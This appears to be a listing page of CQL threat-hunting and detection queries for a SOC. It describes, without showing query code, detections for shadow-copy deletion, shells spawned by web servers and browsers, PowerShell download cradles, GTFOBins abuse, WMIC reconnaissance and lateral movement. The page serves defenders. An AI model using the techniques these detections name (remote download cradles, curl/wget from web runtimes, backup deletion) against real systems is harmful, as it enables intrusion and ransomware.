CQL Knowledge Base
Ready-to-use CQL queries for threat hunting, detection, and SOC triage. Copy, filter, and search in seconds.
Malicious Deep Link: Messaging App Spawning Command Interpreters
Detects exploitation of URI scheme handlers in Electron-based messaging apps (WhatsApp, Telegram, Discord, Signal) that spawn OS command interpreters — behavioral pattern consistent with CVE-2025-55177 and malicious deep-link attacks.
Shadow Copy Deletion via VSS Tools — Basic Detection
Basic detection of VSS shadow copy deletion via vssadmin, wmic, or PowerShell. Backup deletion is the single most reliable ransomware precursor and should generate an immediate alert in any SOC environment regardless of other context.
Web Server Spawning Unexpected Shell Processes — Basic Detection
Basic detection of web server RCE exploitation patterns: any application runtime (Node.js, Python, PHP, Ruby, Java) spawning OS shells or recon utilities such as bash, curl, wget, or whoami — the foundational indicator behind CVE-2025-55182 (React2Shell).
APT Lateral Movement via Remote Administrative Protocols
Detects APT lateral movement using remote administration protocols (SMB, WMI, WinRM) initiated from command-line tools on end-user hosts. Correlates administrative processes with outbound connections to management ports.
APT Chained WMIC Reconnaissance Detection
Detects suspicious chained use of wmic.exe by APT actors for system reconnaissance: hardware inventory, user accounts, running processes, and network config. Filters legitimate parents like WmiPrvSE and msiexec to reduce false positives.
Archive Tool Spawning Shell Processes (Compressed File Exploitation)
Detects shell or LOLBin processes directly spawned by archiving utilities like WinRAR or 7-Zip, behavior associated with code execution via malicious archives similar to WinRAR CVE-2023-38831.
Credential Spray and Authentication Bypass on Network Logon
Detects credential spraying attacks and potential authentication bypass attempts exploiting incomplete access control implementations. Identifies high-frequency network logons from the same source IP and classifies by risk level.
AWS IAM Abuse for Establishing Persistence
Detects AWS IAM operations indicative of APT persistence: user creation, administrative policy attachment, access key generation, role creation, and trust policy modification. Designed for environments with Falcon Cloud Security integrated.
Web Browser Spawning a Command Interpreter Process
Detects when a web browser process directly spawns a command interpreter or scripting engine. Highly anomalous behavior associated with browser exploitation, advanced social engineering, or drive-by download attacks.
CMD Shell Reconnaissance Commands APT-3 Style
Detects cmd.exe executions with system enumeration commands associated with APT-3 group, including whoami, net user, ipconfig, systeminfo, and nltest for domain trust reconnaissance.
Linux GTFOBins Abuse for Privilege Escalation
Detects abuse of native Linux binaries listed in GTFOBins to escape restricted environments, read sensitive system files, or spawn elevated shells. Covers LOTL techniques actively used by threat actors in Linux and macOS environments.
Shell Process Spawned by Node.js (Potential React2Shell Exploitation)
Detects shell or scripting processes spawned by Node.js, a potential indicator of CVE-2025-55182 (React2Shell) exploitation — an insecure deserialization vulnerability in the React Server Components Flight protocol enabling remote code execution.
PowerShell Remote Download Cradle Detection
Identifies PowerShell executions containing typical remote download patterns (IEX, Net.WebClient, BitsTransfer), techniques used in early APT compromise stages to download and execute in-memory payloads without touching disk.
Basic Detection: Child Processes Spawned by WMI Provider Host
Basic query to detect any process spawned by WmiPrvSE.exe. Unexpected child process generation from the WMI Provider Host may indicate remote command execution or persistence. Ideal for SOC analysts starting with threat hunting in CrowdStrike Falcon.
WMIC Abuse via Non-Standard Parent Process (APT-Style)
Detects WMIC.exe executions spawned by unusual parent processes matching APT reconnaissance and lateral movement techniques. Excludes legitimate management tools and classifies risk by frequency.
Impossible Travel Detection via RDP Logon Sequences
Detects impossible travel by analyzing consecutive RDP logons from the same user across different countries using neighbor() to compare adjacent events in time.
Lateral Movement Scoring via SMB + Process Correlation
Detects lateral movement by correlating outbound SMB connections with remote process execution on the destination host, assigning a composite risk score per behavior.
Process Injection Chain Detection with Risk Scoring
Identifies process injection chains by correlating CreateRemoteThread, WriteProcessMemory, and post-injection behavior using correlate() to link the 3-step sequence.
APT 3 - Multi-Tool Discovery via CMD Shell (T1059.003)
Detects multiple native Windows discovery tools launched from cmd.exe by the same user on the same host. Characteristic pattern of APT 3 (Gothic Panda) using Windows Command Shell (T1059.003) to run commands like whoami, ipconfig, and systeminfo during initial compromise phases.
Browser Engine Exploit Indicator — Suspicious Shell Spawned from Browser Process
Detects when a web browser process (Chrome, Edge, Firefox) directly spawns a command interpreter or LOLBin, anomalous behavior that may indicate exploitation of critical browser engine vulnerabilities such as type-confusion V8 zero-days